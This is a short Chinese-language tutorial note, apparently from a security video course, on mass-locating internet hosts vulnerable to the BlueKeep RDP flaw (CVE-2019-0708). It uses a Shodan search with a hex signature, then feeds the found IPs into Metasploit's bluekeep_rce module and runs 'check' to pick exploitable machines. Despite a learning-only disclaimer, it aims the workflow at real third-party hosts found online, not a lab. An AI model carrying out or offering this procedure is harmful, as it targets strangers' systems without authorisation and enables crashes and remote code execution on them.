shodan2-批量查找CVE-2019-0708漏洞

声明！
学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下，如涉及侵权马上删除文章，笔记只是方便各位师傅的学习和探讨，文章所提到的网站以及内容，只做学习交流，其他均与本人以及泷羽sec团队无关，切勿触碰法律底线，否则后果自负！！！！

批量查找CVE-2019-0708漏洞

简述：

漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的，导致机器蓝屏瘫痪。

输入命令：

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

用16进制是因为shodan search vuln:cve -2019-0708 命令对于学术账号无权限使用，需要注册更高一级账户

查到ip和对应端口后，通过 shodan host ip 来验证是否存在该漏洞，如下所示，这个ip则存在CVE-2019-0708漏洞

扫描下来的ip可以放到文档里（注意把端口删掉），利用windows自带远程桌面连接尝试连接

回到kali，输入msfconsole，再输入search 0708 查找此漏洞

输入以下命令启用这个模块

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

输入show options显示选项

然后输入 set rhosts file: 上述存放ip的文档路径

这里可以直接把文件托进命令面板

再输入check检查，带* 号的不能利用，带+号的可以利用

输入show targets可以查看利用的版本

输入exit退出